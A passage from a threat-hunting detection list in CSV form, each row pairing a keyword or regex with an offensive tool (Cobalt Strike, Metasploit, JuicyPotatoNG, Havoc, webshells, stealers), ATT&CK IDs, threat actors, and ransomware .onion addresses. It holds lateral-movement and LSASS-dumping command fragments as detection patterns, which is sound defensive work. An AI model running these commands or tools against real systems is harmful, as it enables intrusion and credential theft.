security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50161" "*juicypotato.x64.dll*",".{0,1000}juicypotato\.x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50162" "*juicypotato.x86.dll*",".{0,1000}juicypotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","50163" "*juicypotato_reflective.dll*",".{0,1000}juicypotato_reflective\.dll.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","50164" "*JuicyPotatoNG.cpp*",".{0,1000}JuicyPotatoNG\.cpp.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50165" "*JuicyPotatoNG.exe*",".{0,1000}JuicyPotatoNG\.exe.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege 
Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50166" "*JuicyPotatoNG.sln*",".{0,1000}JuicyPotatoNG\.sln.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50167" "*JuicyPotatoNG.txt*",".{0,1000}JuicyPotatoNG\.txt.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50168" "*JuicyPotatoNG.zip*",".{0,1000}JuicyPotatoNG\.zip.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50169" "*JuicyPotatoNG-main*",".{0,1000}JuicyPotatoNG\-main.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","50170" 
"*jump psexec_psh*",".{0,1000}jump\spsexec_psh.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50171" "*jump psexec64*",".{0,1000}jump\spsexec64.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a 
network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50172" "*jump winrm *",".{0,1000}jump\swinrm\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50173" "*jump winrm*",".{0,1000}jump\swinrm.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 
- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","50174" "*jump-exec psexec *",".{0,1000}jump\-exec\spsexec\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","50175" "*jump-exec scshell*",".{0,1000}jump\-exec\sscshell.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 
- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","50176" "*JumpSession_BOF-main*",".{0,1000}JumpSession_BOF\-main.{0,1000}","offensive_tool_keyword","JumpSession_BOF","Beacon Object File allowing creation of Beacons in different sessions","T1055 - T1055.012 - T1548.002","TA0002 - TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/Octoberfest7/JumpSession_BOF","1","1","N/A","N/A","9","1","80","13","2022-05-23T22:23:33Z","2022-05-21T17:38:18Z","50177" "*JunctionFolder.exe*",".{0,1000}JunctionFolder\.exe.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. 
On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","50178" "*--just-clean*cleaning/to_clean.txt*",".{0,1000}\-\-just\-clean.{0,1000}cleaning\/to_clean\.txt.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","50179" "*-just-dc-user not compatible in LOCAL mode*",".{0,1000}\-just\-dc\-user\snot\scompatible\sin\sLOCAL\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50180" "*-just-dc-user switch is not supported in VSS mode*",".{0,1000}\-just\-dc\-user\sswitch\sis\snot\ssupported\sin\sVSS\smode.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","50181" "*jweny/zabbix-saml-bypass-exp*",".{0,1000}jweny\/zabbix\-saml\-bypass\-exp.{0,1000}","offensive_tool_keyword","POC","POC exploitation of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured 
SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://github.com/jweny/zabbix-saml-bypass-exp","1","1","N/A","N/A","N/A","1","93","42","2022-02-21T04:27:48Z","2022-02-18T08:38:53Z","50182" "*jwqpucwiolhmivnqt7qwroezymksxfjsbj6pmg2lnnglqpoe26cwnryd.onion*",".{0,1000}jwqpucwiolhmivnqt7qwroezymksxfjsbj6pmg2lnnglqpoe26cwnryd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50183" "*jwt_tool*",".{0,1000}jwt_tool.{0,1000}","offensive_tool_keyword","jwt_tool","jwt_tool.py is a toolkit for validating. forging. scanning and tampering JWTs (JSON Web Tokens).","T1210.001 - T1201 - T1059 - T1222","TA0002 - TA0001 - TA0007","N/A","N/A","Exploitation tool","https://github.com/ticarpi/jwt_tool","1","0","N/A","N/A","N/A","10","5765","701","2024-08-01T19:15:50Z","2017-01-23T21:13:50Z","50184" "*-K lsass_loot*",".{0,1000}\-K\slsass_loot.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50186" "*-k -no-pass -p '' --auth-method kerberos*",".{0,1000}\-k\s\-no\-pass\s\-p\s\'\'\s\-\-auth\-method\skerberos.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","50187" "*K07MLUosSSzOyM+OycvMzsjM4eUCAA==*",".{0,1000}K07MLUosSSzOyM\+OycvMzsjM4eUCAA\=\=.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","50188" "*K1W1F01D3r(*",".{0,1000}K1W1F01D3r\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50189" "*K1W1F113(*",".{0,1000}K1W1F113\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","50190" "*k4yt3x/orbitaldump*",".{0,1000}k4yt3x\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tool","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","N/A","5","460","83","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z","50191" "*k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd.onion*",".{0,1000}k7kg3jqxang3wh7hnmaiokchk7qoebupfgoik6rha6mjpzwupwtj25yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in 
ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","50192" "*K8_CS_*.rar*",".{0,1000}K8_CS_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","50193" "*k8gege.org/*",".{0,1000}k8gege\.org\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50194" 
"*k8gege/Ladon*",".{0,1000}k8gege\/Ladon.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50195" "*K8Ladon.sln*",".{0,1000}K8Ladon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
